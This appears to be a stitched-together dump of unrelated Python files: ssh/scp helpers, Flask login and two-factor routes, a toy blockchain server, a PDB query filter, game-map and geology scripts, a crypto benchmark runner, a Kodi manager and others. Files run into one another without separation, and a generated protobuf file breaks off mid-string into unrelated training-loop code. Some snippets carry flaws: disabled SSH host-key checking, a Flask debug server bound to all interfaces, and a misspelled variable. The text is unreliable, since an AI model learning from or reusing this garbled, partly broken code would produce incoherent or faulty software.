pid = os.fork() if pid == 0: # a child process if debug: print(f"{ssh}") cmd = shlex.split(ssh) os.execv(cmd[0], cmd) os.wait() def do_scp(ip: str, port: str, user: str, src: str, target: str, show: bool, debug: bool): """Create a ssh session""" scp = f'/usr/bin/scp -P {port} -r -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o LogLevel=ERROR {src} {user}@{ip}:{target}' if show: print(scp) return pid = os.fork() if pid == 0: # a child process if debug: print(f"{scp}") cmd = shlex.split(scp) os.execv(cmd[0], cmd) os.wait()# -*- coding: utf-8 -*- import tensorflow as tf class TrainConfig(object): def __init__(self): # the number of step between evaluation self.train_input_size = 1 self.train_data_size = 0.8 self.test_data_size = 0.8 self.training_epochs = 300 self.optimizer = 'adam' self.loss_fn = 'mse' saved_model_folder_path = './saved_model' if not tf.gfile.Exists(saved_model_folder_path): tf.gfile.MakeDirs(saved_model_folder_path) self.save_weight_name= saved_model_folder_path + '/save_weight_1.h5' sbliven/mmtf-pyspark10-100 '''customReportQuery.py This filter runs an SQL query on specified PDB metadata and annotation fields retrived using RCSB PDB RESTful web services. The fields are then queried and the resulting PDB IDs are used to filter the data. The input to the filter consists of an SQL WHERE clause, and list data columns availible from RCSB PDB web services. References ---------- - List of supported field names: `reportFiled `_ - Examples of SQL WHERE clauses: `SQL where `_ Examples -------- Find PDB entries with Enzyme classification number 2.7.11.1 and source organism Homo sapiens: >>> pdb = read_full_sequence_files(sc) >>> whereClause = "WHERE ecNo='2.7.11.1' AND source='Homo sapiens'" >>> pdb = pdb.filter(RcsbWebserviceFilter(whereClause, "ecNo","source")) ''' __author__ = "" __maintainer__ = "" __email__ = "" __status__ = "Done" from mmtfPyspark.datasets import customReportService from pyspark.sql import SparkSession class CustomReportQuery(object): '''Filters using an SQL query on the specified fields Attributes ---------- whereClause : str WHERE Clause of SQL statement fields : str, list one or more field names to be used in query ''' def __init__(self, whereClause, fields): # Check if fields are in a list or string if type(fields) == str: if ',' in fields: fields = fields.split(',') else: fields = [fields] # Get requested data columns dataset = customReportService.get_dataset(fields) # Check if the results contain chain level data self.chainLevel = "structureChainId" in dataset.columns # Create a temporary view of the dataset dataset.createOrReplaceTempView("table") # Create SparkSession spark = SparkSession.builder.getOrCreate() # Run SQL query if (self.chainLevel): # For chain level data sql = "SELECT structureChainID, structureId, chainId FROM table " \ + whereClause results = spark.sql(sql) # Add both PDB entry and chain level data, so chain-based data can be filtered self.pdbIds = results.distinct().rdd.map(lambda x: x[0]).collect() self.pdbIds += results.distinct().rdd.map(lambda x: x[1]).collect() else: # For PDB entry level data sql = "SELECT structureId FROM table " + whereCaluse results = spark.sql(sql) self.pdbIds = results.distinct().rdd.map(lambda x: x[0]).collect() self.pdbIds = list(set(self.pdbIds)) def __call__(self, t): match = t[0] in self.pdbIds # If results are PDB IDs, but the keys contains chain names, # Then truncate the chain name before matching (e.g., 4HHB.A -> 4HHB) if (not self.chainLevel) and (not match) and (len(t[0]) > 4): print(t[0]) return t[0][:4] in self.pdbIds return match #!/usr/bin/env python3 """A small set of functions for doing math operations. """ # Write a function named add that adds two values def add(a, b): """Function that adds two arguments """ return a + b def sub(a, b): """Function that subtracts two arguments """ return a - b def mult(a, b): """Function that multiplies two arguments """ return a * b def div(a, b): """Function that divides two arguments """ return a / b def intDiv(a, b): """Function that divides two arguments with integer division """ return a // b """""" #################################################################################################### # IMPORTS ################################################################################ IMPORTS # #################################################################################################### # Standard Library import io import json # Installed import flask import werkzeug from dds_web.api.db_connector import DBConnector import flask_login import pyqrcode import pyotp import itsdangerous import sqlalchemy import marshmallow # Own Modules from dds_web import auth from dds_web import forms from dds_web.database import models import dds_web.utils from dds_web import db, limiter import dds_web.api.errors as ddserr from dds_web.api.schemas import user_schemas from dds_web import mail auth_blueprint = flask.Blueprint("auth_blueprint", __name__) #################################################################################################### # ERROR HANDLING ################################################################## ERROR HANDLING # #################################################################################################### @auth_blueprint.errorhandler(werkzeug.exceptions.HTTPException) def bad_request(error): """Handle user deletion errors.""" try: message = error.message except AttributeError: message = "" flask.current_app.logger.error(f"{error.code}: {message}") return flask.make_response(flask.render_template("error.html", message=message), error.code) #################################################################################################### # ENDPOINTS ############################################################################ ENDPOINTS # #################################################################################################### @auth_blueprint.route("/", methods=["GET"]) @flask_login.login_required def index(): """DDS start page.""" # Check if user has 2fa setup if flask_login.current_user.has_2fa: form = forms.LogoutForm() return flask.render_template("index.html", form=form) else: return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) @auth_blueprint.route("/confirm_invite/", methods=["GET"]) @limiter.limit( dds_web.utils.rate_limit_from_config, error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def confirm_invite(token): """Confirm invitation.""" s = itsdangerous.URLSafeTimedSerializer(flask.current_app.config.get("SECRET_KEY")) try: # Get email from token email = s.loads(token, salt="email-confirm", max_age=604800) # Get row from invite table invite_row = models.Invite.query.filter(models.Invite.email == email).first() except itsdangerous.exc.SignatureExpired as signerr: db.session.delete(invite_row) db.session.commit() raise # TODO: Do not raise api error here, should fix new error handling for web page except (itsdangerous.exc.BadSignature, itsdangerous.exc.BadTimeSignature) as badsignerr: raise except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise # Check the invite exists if not invite_row: if dds_web.utils.email_in_db(email=email): return flask.make_response(flask.render_template("user/userexists.html")) else: raise ddserr.InviteError( message=f"There is no pending invitation for the email adress: {email}" ) # Initiate form form = forms.RegistrationForm() # invite columns: unit_id, email, role flask.current_app.logger.debug(invite_row) # Prefill fields - facility readonly if filled, otherwise disabled form.unit_name.render_kw = {"disabled": True} if invite_row.unit: # backref to unit form.unit_name.data = invite_row.unit.name form.unit_name.render_kw = {"readonly": True} form.email.data = email suggested_username = email.split("@")[0] if dds_web.utils.valid_chars_in_username( suggested_username ) and not dds_web.utils.username_in_db(suggested_username): form.username.data = suggested_username return flask.render_template("user/register.html", form=form) @auth_blueprint.route("/register", methods=["POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def register(): """Handles the creation of a new user""" form = dds_web.forms.RegistrationForm() # Validate form - validators defined in form class if form.validate_on_submit(): # Create new user row by loading form data into schema try: new_user = user_schemas.NewUserSchema().load(form.data) except marshmallow.ValidationError as valerr: flask.current_app.logger.warning(valerr) raise except (sqlalchemy.exc.SQLAlchemyError, sqlalchemy.exc.IntegrityError) as sqlerr: raise ddserr.DatabaseError from sqlerr # Go to two factor authentication setup # TODO: Change this after email is introduced flask_login.login_user(new_user) return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) # Go to registration form return flask.render_template("user/register.html", form=form) @auth_blueprint.route("/login", methods=["GET", "POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, methods=["POST"], error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def login(): """Log user in with DDS credentials.""" # Redirect to index if user is already authenticated if flask_login.current_user.is_authenticated: if flask_login.current_user.has_2fa: return flask.redirect(flask.url_for("auth_blueprint.index")) return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) next = flask.request.args.get("next") # is_safe_url should check if the url is safe for redirects. if not dds_web.utils.is_safe_url(next): return flask.abort(400) # Check if for is filled in and correctly (post) form = forms.LoginForm() if form.validate_on_submit(): # Get user from database user = models.User.query.get(form.username.data) # Unsuccessful login if not user or not user.verify_password(input_password=form.password.data): flask.flash("Invalid username or password.") return flask.redirect( flask.url_for("auth_blueprint.login", next=next) ) # Try login again # Correct username and password --> log user in flask_login.login_user(user) flask.flash("Logged in successfully.") # Go to home page return flask.redirect(next or flask.url_for("auth_blueprint.index")) # Go to login form (get) return flask.render_template("user/login.html", form=form, next=next) @auth_blueprint.route("/logout", methods=["POST"]) @flask_login.login_required def logout(): """Logout user.""" if flask_login.current_user.is_authenticated: flask_login.logout_user() return flask.redirect(flask.url_for("auth_blueprint.index")) @auth_blueprint.route("/twofactor", methods=["GET"]) @flask_login.login_required def two_factor_setup(): """Setup two factor authentication.""" # since this page contains the sensitive qrcode, make sure the browser # does not cache it if flask_login.current_user.has_2fa: return flask.redirect(flask.url_for("auth_blueprint.index")) return ( flask.render_template( "user/two-factor-setup.html", secret=flask_login.current_user.otp_secret ), 200, { "Cache-Control": "no-cache, no-store, must-revalidate", "Pragma": "no-cache", "Expires": "0", }, ) @auth_blueprint.route("/qrcode", methods=["GET"]) @flask_login.login_required def qrcode(): """Generate qrcode""" if flask_login.current_user.has_2fa: return flask.redirect(flask.url_for("auth_blueprint.index")) # render qrcode for FreeTOTP url = pyqrcode.create(flask_login.current_user.totp_uri()) stream = io.BytesIO() url.svg(stream, scale=5) return ( stream.getvalue(), 200, { "Content-Type": "image/svg+xml", "Cache-Control": "no-cache, no-store, must-revalidate", "Pragma": "no-cache", "Expires": "0", }, ) @auth_blueprint.route("/twofactor/verify", methods=["POST"]) @flask_login.login_required def two_factor_verify(): """Verify two factor authentication.""" otp = int(flask.request.form.get("otp")) if flask_login.current_user.verify_totp(otp): flask.flash("The TOTP 2FA token is valid", "success") # User has now setup 2FA flask_login.current_user.set_2fa_seen() try: db.session.commit() except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise ddserr.DatabaseError from sqlerr return flask.redirect(flask.url_for("auth_blueprint.index")) else: flask.flash("You have supplied an invalid 2FA token!", "danger") return flask.redirect(flask.url_for("auth_blueprint.two_factor_setup")) @auth_blueprint.route("/reset_password", methods=["GET", "POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, methods=["POST"], error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def request_reset_password(): """Request to reset password when password is lost.""" # Reset forgotten password only allowed if logged out if flask_login.current_user.is_authenticated: return flask.redirect(flask.url_for("auth_blueprint.index")) # Validate form form = forms.RequestResetForm() if form.validate_on_submit(): email = models.Email.query.filter_by(email=form.email.data).first() dds_web.utils.send_reset_email(email_row=email) flask.flash("An email has been sent with instructions to reset your password.", "info") return flask.redirect(flask.url_for("auth_blueprint.login")) # Show form return flask.render_template("user/request_reset_password.html", form=form) @auth_blueprint.route("/reset_password/", methods=["GET", "POST"]) @limiter.limit( dds_web.utils.rate_limit_from_config, error_message=ddserr.error_codes["TooManyRequestsError"]["message"], ) def reset_password(token): """Perform the password reset when password is lost.""" # Go to index page if already logged in if flask_login.current_user.is_authenticated: return flask.redirect(flask.url_for("auth_blueprint.index")) # Verify that the token is valid and contains enough info user = models.User.verify_reset_token(token=token) if not user: flask.flash("That is an invalid or expired token", "warning") return flask.redirect(flask.url_for("auth_blueprint.request_reset_password")) # Get form for reseting password form = forms.ResetPasswordForm() # Validate form if form.validate_on_submit(): user.password = form.password.data db.session.commit() flask.flash("Your password has been updated! You are now able to log in.", "success") return flask.redirect(flask.url_for("auth_blueprint.login")) # Go to form return flask.render_template("user/reset_password.html", form=form) @auth_blueprint.route("/change_password", methods=["GET", "POST"]) @flask_login.login_required def change_password(): """Change password by entering the old password.""" # Validate form form = forms.ChangePasswordForm() if form.validate_on_submit(): # Change password flask_login.current_user.password = form.new_password.data db.session.commit() flask_login.logout_user() flask.flash("You have successfully changed your password.", "success") return flask.redirect(flask.url_for("auth_blueprint.login")) # Show form return flask.render_template("user/change_password.html", form=form) @auth_blueprint.route("/confirm_deletion/", methods=["GET"]) @flask_login.login_required def confirm_self_deletion(token): """Confirm user deletion.""" s = itsdangerous.URLSafeTimedSerializer(flask.current_app.config.get("SECRET_KEY")) try: # Get email from token email = s.loads(token, salt="email-delete", max_age=604800) # Check that the email is registered on the current user: if email not in [email.email for email in flask_login.current_user.emails]: msg = f"The email for user to be deleted is not registered on your account." flask.current_app.logger.warning( f"{msg} email: {email}: user: {flask_login.current_user}" ) raise ddserr.UserDeletionError(message=msg) # Get row from deletion requests table deletion_request_row = models.DeletionRequest.query.filter( models.DeletionRequest.email == email ).first() except itsdangerous.exc.SignatureExpired: db.session.delete( models.DeletionRequest.query.filter(models.DeletionRequest.email == email).all() ) db.session.commit() raise ddserr.UserDeletionError( message=f"Deletion request for {email} has expired. Please login to the DDS and request deletion anew." ) except (itsdangerous.exc.BadSignature, itsdangerous.exc.BadTimeSignature): raise ddserr.UserDeletionError( message=f"Confirmation link is invalid. No action has been performed." ) except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise ddserr.DatabaseError(message=sqlerr) # Check if the user and the deletion request exists if deletion_request_row: try: user = user_schemas.UserSchema().load({"email": email}) DBConnector.delete_user(user) # remove the deletion request from the database db.session.delete(deletion_request_row) db.session.commit() except sqlalchemy.exc.SQLAlchemyError as sqlerr: raise ddserr.UserDeletionError( message=f"User deletion request for {user.username} / {user.primary_email.email} failed due to database error: {sqlerr}", alt_message=f"Deletion request for user {user.username} registered with {user.primary_email.email} failed for technical reasons. Please contact the unit for technical support!", ) return flask.make_response( flask.render_template("user/userdeleted.html", username=user.username, initial=True) ) else: return flask.make_response( flask.render_template("user/userdeleted.html", username=email, initial=False) ) import _initpath import os import re import collections from PIL import Image import pyradox tree = pyradox.txt.parse_file(os.path.join(pyradox.get_game_directory('EU4'), 'map', 'terrain.txt')) terrain_bmp = Image.open(os.path.join(pyradox.get_game_directory('EU4'), 'map', 'terrain.bmp')) print(terrain_bmp.getpalette()) province_map = pyradox.worldmap.ProvinceMap() colormap = {} for province_id, position in province_map.positions.items(): print(province_id) colormap[province_id] = tuple(terrain_bmp.getpixel(position)) for terrain_type, terrain_data in tree['categories'].items(): if 'color' not in terrain_data: continue color = tuple(terrain_data.find_all('color')) for province_id in terrain_data.find_all('terrain_override'): colormap[province_id] = color out = province_map.generate_image(colormap) out.save('out/terrain_map.png') Loop3D/LoopProjectFile0 import LoopProjectFile as LPF import sys import numpy # Start Main function # Sanity check arguments if len(sys.argv) < 2: print("Usage: python run.py ") quit() else: filename = sys.argv[1] # Create basic Loop Project and add extents for broken hill region LPF.CreateBasic(filename) geodes = [-31.90835,-31.863242,141.493799,141.546666] utm = [54,'S',6469600,6474600,546700,551700] depth = [-1000,-6000] spacing = [100,100,100] LPF.Set(filename,"extents",geodesic=geodes,utm=utm,depth=depth,spacing=spacing) # Check new file is valid and report the version of the file LPF.CheckFileValid(filename, True) resp = LPF.Get(filename,"version") if resp["errorFlag"]: print(resp["errorString"]) else: print(resp["value"]) # Report the extents of the new file resp = LPF.Get(filename,"extents") if resp["errorFlag"]: print(resp["errorString"]) else: extents = resp["value"] print("Geodesic:", extents["geodesic"]) print("UTM: ", extents["utm"]) print("Depth: ", extents["depth"]) print("Spacing: ", extents["spacing"]) # Grab the dummy dataset from the bh Loop Project File with shape (51x51x51) # and add it to this project (required to have the same shape) resp = LPF.Get("bh.loop3d","strModel") if resp["errorFlag"]: print(resp["errorString"]) else: strData = resp["value"] resp2 = LPF.Set(filename,"strModel",data=strData,index=0) if resp2["errorFlag"]: print(resp2["errorString"]) else: print("Data saved in new file") resp3 = LPF.Get(filename,"strModel",index=0) if resp3["errorFlag"]: print(resp3["errorString"]) else: print("Data received again") stratigraphy = numpy.zeros(3,LPF.stratigraphicLayerType) stratigraphy[0] = (1,1.0,1.1,b'Thick One',1000.0,0,0,0,0,0,0) stratigraphy[1] = (2,1.1,1.2,b'Thin One',100.0,0,0,0,0,0,0) stratigraphy[2] = (2,1.1,1.2,b'Next One',50.0,0,0,0,0,0,0) LPF.Set(filename,"stratigraphicLog",data=stratigraphy) # Set some dummy observations within the region of interest contacts = numpy.zeros(3,LPF.contactObservationType) contacts[0] = (1,550500.0,6470000.0,0.0) contacts[1] = (2,550500.0,6070000.0,0.0) contacts[2] = (3,500500.0,6070000.0,0.0) LPF.Set(filename,"contacts",data=contacts) LPF.Set(filename,"contactsAppend",data=contacts) # Get the observation data back out to confirm it was saved resp = LPF.Get(filename,"stratigraphicLog") if resp["errorFlag"]: print(resp["errorString"]) else: print(resp["value"]) # Get the observation data back out to confirm it was saved resp = LPF.Get(filename,"contacts",indexRange=(0,7)) if resp["errorFlag"]: print(resp["errorString"]) else: print(resp["value"])contacts/migrations/0007_auto_20150902_2228.py0 # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('contacts', '0006_auto_20150902_2225'), ] operations = [ migrations.AlterField( model_name='adult', name='cellphone', field=models.CharField(max_length=32, null=True, blank=True), ), migrations.AlterField( model_name='adult', name='email', field=models.CharField(max_length=64, null=True, blank=True), ), migrations.AlterField( model_name='adult', name='homephone', field=models.CharField(max_length=32, null=True, blank=True), ), migrations.AlterField( model_name='family', name='email', field=models.CharField(max_length=64, null=True, blank=True), ), ] import random import hashlib, json import requests from urllib.parse import urlparse from textwrap import dedent from uuid import uuid4 from flask import Flask , jsonify , request, render_template, redirect from time import time from flask_cors import CORS port = 0 class Blockchain(): def __init__(self): self.chain = [] self.current_transactions= [] self.nodes = set() #genesis block self.new_block(previous_hash=1, proof=100) def new_block(self, proof , previous_hash=None): block ={ 'index': len(self.chain) + 1 , 'timestamp' : time(), 'transactions': self.current_transactions, 'proof' : proof, 'previous_hash': previous_hash or self.hash(self.chain[-1]) } self.current_transactions=[] self.chain.append(block) return block def new_transaction(self,url , ip): self.current_transactions.append( { 'url': url, 'ip' : ip } ) return self.last_block['index']+1 @staticmethod def hash(block): block_string = json.dumps(block , sort_keys=True).encode() return hashlib.sha256(block_string).hexdigest() @property def last_block(self): return self.chain[-1] def proof_of_work(self , last_proof): proof = 0 while self.valid_proof(last_proof, proof) is False: proof+=1 return proof @staticmethod def valid_proof(last_proof, proof): guess = f'{last_proof}{proof}'.encode() guess_hash = hashlib.sha256(guess).hexdigest() return guess_hash[:5]== '00000' def register_node(self , address, flag): parsed_url = urlparse(address) if parsed_url.netloc != "": if flag == 1: self.trigger_flood_nodes(address) for node in self.nodes: node = "http://" + node requests.post(url=f'http://{parsed_url.netloc}/nodes/register', json={ 'nodes': [node], 'flag': 0 }) self.nodes.add(parsed_url.netloc) def valid_chain(self , chain): last_block = chain[0] for current_index in range(1 , len(chain)): block = chain[current_index] print(f'{last_block}') print(f'{block}') print('\n----------\n') if block['previous_hash']!=self.hash(last_block): return False if not self.valid_proof(last_block['proof'] , block['proof']): return False last_block = block else: return True def resolve_conflicts(self): neighbours = self.nodes new_chain = None max_length = len(self.chain) for node in neighbours: response = requests.get(f'http://{node}/chain') if response.status_code ==200: length = response.json()['length'] chain = response.json()['chain'] if length >= max_length and self.valid_chain(chain): max_length = length new_chain = chain if new_chain: self.chain = new_chain return True return False def triggered_flood_chain(self): for node in self.nodes: requests.get(f'http://{node}/nodes/resolve') def trigger_flood_nodes(self,address): for node in self.nodes: requests.post(url=f'http://{node}/nodes/register', json={ 'nodes': [address] , 'flag': 0 }) def redundancy(self,url): for block in self.chain: for i in block['transactions']: if i['url'] == str(url): return True else: return False # Flask API code here app = Flask(__name__) node_identifier = str(uuid4()).replace('-', '') CORS(app) blockchain = Blockchain() @app.route("/") def index(): return render_template("index.html") @app.route('/mine', methods= ['GET']) def mine(): last_block = blockchain.last_block last_proof = last_block['proof'] proof = blockchain.proof_of_work(last_proof) previous_hash = blockchain.hash(last_block) block = blockchain.new_block(proof, previous_hash) with open("data/"+str(port)+"_chain.json", "w") as file: json.dump(blockchain.chain, file) response = { 'message' : "New Block Forged", 'index': block['index'] , 'transactions': block['transactions'], 'proof': block['proof'], 'previous_hash': block['previous_hash'], } blockchain.triggered_flood_chain() return jsonify(response) , 200 @app.route('/transactions', methods=['GET']) def full_transactions(): return jsonify({ 'transactions': blockchain.current_transactions }) @app.route('/transactions/new', methods=['POST']) def new_transaction(): values = request.get_json() required = ['url', 'ip'] if not all(k in values for k in required): return 'missing values' , 400 if blockchain.redundancy(values['url']): return jsonify({'message': 'url already taken.'}) if urlparse(values['url']).netloc != "": index = blockchain.new_transaction(urlparse(values['url']).netloc , values['ip']) response = {'message' : f'Transaction will be added to Block {index} '} return jsonify(response) , 201 else: return jsonify({"message": "Invalid url!"}), 201 @app.route('/chain' , methods=['GET']) def full_chain(): response={ 'chain': blockchain.chain, 'length': len(blockchain.chain), } return jsonify(response), 200 @app.route('/nodes', methods=['GET']) def full_nodes(): return jsonify({ 'nodes': list(blockchain.nodes) }) @app.route('/nodes/register', methods= ['POST']) def register_nodes(): values = request.get_json() nodes = values.get('nodes') flag = values.get('flag') print(flag) if nodes is None: return 'Error: Please supply a valid list of nodes' , 400 for node in nodes: blockchain.register_node(node, flag) response = { 'message' : 'new nodes have been added', 'total_nodes': list(blockchain.nodes) } blockchain.resolve_conflicts() with open("data/"+str(port)+"_chain.json", "w") as file: json.dump(blockchain.chain, file) return jsonify(response) , 201 @app.route('/nodes/resolve', methods=['GET']) def consensus(): replaced = blockchain.resolve_conflicts() if replaced: with open("data/"+str(port)+"_chain.json", "w") as file: json.dump(blockchain.chain, file) response = { 'message': 'Our chain was replaced', 'new_chain': blockchain.chain, } else: response = { 'message': 'Our chain is authoritative', 'chain': blockchain.chain, } return jsonify(response), 200 @app.route('/url/', methods=['GET']) def red(url): print(url) for block in reversed(blockchain.chain): for i in block['transactions']: if i['url'] == str(url): return jsonify({"Flag": True, "IP": i['ip']}) return jsonify({"Flag": False, "Message": "Error 404! Not found"}) if __name__ == "__main__": port = int(input('Enter port: ')) try: with open("data/"+str(port)+"_chain.json", "r") as file: blockchain.chain = json.loads(file.read()) except: file = open("data/"+str(port)+"_chain.json", "w") file.close() app.run(host='0.0.0.0', port=port, debug=True)wwongkamjan/dipnet_press # Generated by the protocol buffer compiler. DO NOT EDIT! # source: diplomacy_tensorflow/core/protobuf/tensorflow_server.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from diplomacy_tensorflow.core.protobuf import config_pb2 as diplomacy__tensorflow_dot_core_dot_protobuf_dot_config__pb2 from diplomacy_tensorflow.core.protobuf import cluster_pb2 as diplomacy__tensorflow_dot_core_dot_protobuf_dot_cluster__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='diplomacy_tensorflow/core/protobuf/tensorflow_server.proto', package='diplomacy.tensorflow', syntax='proto3', serialized_options=_b('\n\032org.tensorflow.distruntimeB\014ServerProtosP\001Z 100: batch_loss = dy.esum(losses) batch_loss.forward() batch_loss.backward() self.trainer.update() dy.renew_cg() losses = [] errors = (errors/len(data))*100 if len(losses)>0: batch_loss= dy.esum(losses) batch_loss.forward() batch_loss.backward() self.trainer.update() dy.renew_cg() if i%10==0: print "Epoch: %d Loss: %.3f - Error: %.1f"%(i, total_loss, errors) if prev_loss < total_loss: loss_not_improving += 1 if loss_not_improving > 10 or i > self.epochs: break prev_loss = total_loss 1-10 #!/usr/bin/env python3 import datetime import subprocess import sys import serial import numpy as np from config import Settings testType = "test" iterations = 1 ntests = 10 schemeList = ["lightsaber", "saber", "firesaber"] impleList = ["speed", "speedstack", "stack", "_32bit"] cpu = "m3" def getBinary(scheme, impl): return f"elf/crypto_kem_{scheme}_{impl}_{testType}.elf" def getFlash(binary): return f"openocd -f nucleo-f2.cfg -c \"program {binary} reset exit\" " def makeAll(): subprocess.check_call(f"make clean", shell=True) subprocess.check_call(f"make -j4 ITERATIONS={iterations}", shell=True) def test(scheme, impl): binary = getBinary(scheme, impl) try: subprocess.check_call(getFlash(binary), shell=True) except: print("st-flash failed --> retry") return test(scheme, impl) with serial.Serial(Settings.SERIAL_DEVICE, Settings.BAUD_RATE, timeout=10) as dev: log = b"" while True: device_output = dev.read() if device_output == b'': print("timeout --> retry") return test(scheme, impl) sys.stdout.buffer.write(device_output) sys.stdout.flush() log += device_output if device_output == b'#': break log = log.decode(errors="ignore") assert log.count("ERROR") == 0 and log.count("OK") == ntests makeAll() for scheme in schemeList: for imple in impleList: test(scheme, cpu + imple) rafaelurben/django-onlinevarsonlinevars/urls.py from django.urls import path from django.contrib.auth import views as auth_views from django.conf import settings from . import views ####################### app_name = 'onlinevars' urlpatterns = [ path('api/v1/', views.api_v1, name="api-v1"), path('chat/', views.chat_start, name="chat-start"), path('chat///', views.chat, name="chat") ] import tkinter # organizando e trabalhando com duas frames # - - ---------------------------------------------------------------------------------- # funções # --------------------------------------------------------------------------------------- # GUI root = tkinter.Tk() root.title("Aplicação") # ------------------------------------------------------------------------------------ # widget frame_nome = tkinter.Frame(root) frame_end = tkinter.Frame(root) label_nome = tkinter.Label(frame_nome, text='Nome:') label_sobren = tkinter.Label(frame_nome, text='Sobrenome:') label_rua = tkinter.Label(frame_end, text='Rua:') label_cidade = tkinter.Label(frame_end, text='Cidade:') text_nome = tkinter.Entry(frame_nome) text_sobren = tkinter.Entry(frame_nome) text_rua = tkinter.Entry(frame_end) text_cidade = tkinter.Entry(frame_end) cmd_salvar = tkinter.Button(root, text='Salvar') # ------------------------------------------------------------------------------------ # layout label_nome.grid(row=0, column=0) label_sobren.grid(row=1, column=0) text_nome.grid(row=0, column=1) text_sobren.grid(row=1, column=1) label_rua.grid(row=0, column=0) label_cidade.grid(row=1, column=0) text_rua.grid(row=0, column=1) text_cidade.grid(row=1, column=1) frame_nome.grid(row=0, column=0) frame_end.grid(row=0, column=1) cmd_salvar.grid() root.mainloop()#!/usr/bin/env python3 import time import os from kodijsonrpc import KodiJSONClient from jsonrpcclient.exceptions import ReceivedErrorResponse, ReceivedNoResponse from utils import logger class KodiHost(KodiJSONClient): def __init__(self, name, hostname, port, username, password, always_on, show_notifications): self.name = name self.scanned = False self.always_on = always_on self.show_notifications = show_notifications super().__init__(hostname, port, username, password) @property def isAlive(self): try: return self.JSONRPC.Ping() == 'pong' # pylint: disable=no-member except Exception: return False @property def inUse(self): try: response = self.Player.GetActivePlayers() # pylint: disable=no-member except ReceivedErrorResponse: return True if len(response) > 0: return True return False def notify(self, msg, title='Kodi Library Manager'): imageURL = 'https://github.com/jsaddiction/KodiLibrarian/raw/main/img/' if title.lower() == 'sonarr': imageURL += 'Sonarr.png' elif title.lower() == 'radarr': imageURL += 'Radarr.png' elif title.lower() == 'lidarr': imageURL += 'Lidarr.png' else: imageURL += 'KodiLibrarian.png' params = { 'title': title, 'message': msg, 'displaytime': 5000, 'image': imageURL } self.GUI.ShowNotification(params) # pylint: disable=no-member class Librarian(): TIMEOUT = 20 log = logger.get_log('Librarian') def __init__(self, hostList, update_while_playing=False): self.hosts = [] self.update_while_playing = update_while_playing for host in hostList: client = KodiHost( name=host['name'], hostname=host['hostname'], port=host['port'], username=host['username'], password=host['password'], always_on=host['always_on'], show_notifications=host['show_notifications'], ) if client.isAlive: self.hosts.append(client) else: self.log.warning('Failed to establish connection with {}.'.format(client.name)) def _modifyWatchedState(self, watchedState): # Create modified watched state newWatchedState = dict(watchedState) newWatchedState['lastplayed'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) newWatchedState['playcount'] += 1 return newWatchedState def cleanLibrary(self, content=None): params = { 'showdialogs': False, 'content': content } if not content or not content in ['movies', 'tvshows']: del params['content'] for host in self.hosts: self.log.info('Initiating clean of {} on host: {}'.format(content, host.name)) try: response = host.VideoLibrary.Clean(params) except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue return ######################## TV Show methods ####################### def _getTVShowID(self, path): # returns int tvshow id of show located within path if not path.endswith('/'): path += '/' showList = self._getTVShows() for show in showList: if show['file'] == path: return show['tvshowid'] return None def _getTVShows(self): # returns list of all tvshows in the library params = { 'properties': ['file'] } for host in self.hosts: try: response = host.VideoLibrary.GetTVShows(params) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get TVShow list. Error: {}'.format(host.name, e)) response = None if response and 'tvshows' in response: return response['tvshows'] return [] def _getEpisodeID(self, tvshowID, episodePath): # returns episodeID of episode located at episodePath if not tvshowID: return None episodes = self._getEpisodes(tvshowID) # return episodeid if only one was found if len(episodes) == 1: return episodes[0]['episodeid'] # return episode id of anything in the list matches path excluding extension for episode in episodes: if os.path.splitext(episode['file'])[0] == os.path.splitext(episodePath)[0]: return episode['episodeid'] return None def _getEpisodes(self, tvshowID): # returns list of all episodes of a tvshow params = { 'tvshowid': int(tvshowID), 'properties': ['lastplayed', 'playcount', 'file', 'season', 'episode', 'tvshowid', 'showtitle'] } for host in self.hosts: try: response = host.VideoLibrary.GetEpisodes(params) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get episodes for tvshowID: {} Error: {}'.format(host.name, tvshowID, e)) response = None if response and 'episodes' in response: return response['episodes'] return [] def _getTVShowDetails(self, tvshowID): if not tvshowID: return None params = { 'tvshowid': tvshowID, 'properties': ['file'] } for host in self.hosts: try: response = host.VideoLibrary.GetTVShowDetails(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get TVShowDetails for tvshowid: {} Error: {}'.format(host.name, tvshowID, e)) continue if response and 'tvshowdetails' in response: return response['tvshowdetails'] return None def _getEpisodeDetails(self, episodeID): if not episodeID: return None params = { 'episodeid': int(episodeID), 'properties': ['lastplayed', 'playcount', 'file', 'season', 'episode', 'tvshowid', 'showtitle', 'dateadded'] } for host in self.hosts: try: response = host.VideoLibrary.getEpisodeDetails(params) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get episode details for episodeID: {} Error: {}'.format(host.name, episodeID, e)) response = None if response and 'episodedetails' in response: return response['episodedetails'] return None def _getEpisodeWatchedState(self, episodeID=None, episodeDetails=None): # returns object contianing watches status of an episode given either episodeid or episode details if episodeID: details = self._getEpisodeDetails(episodeID) elif 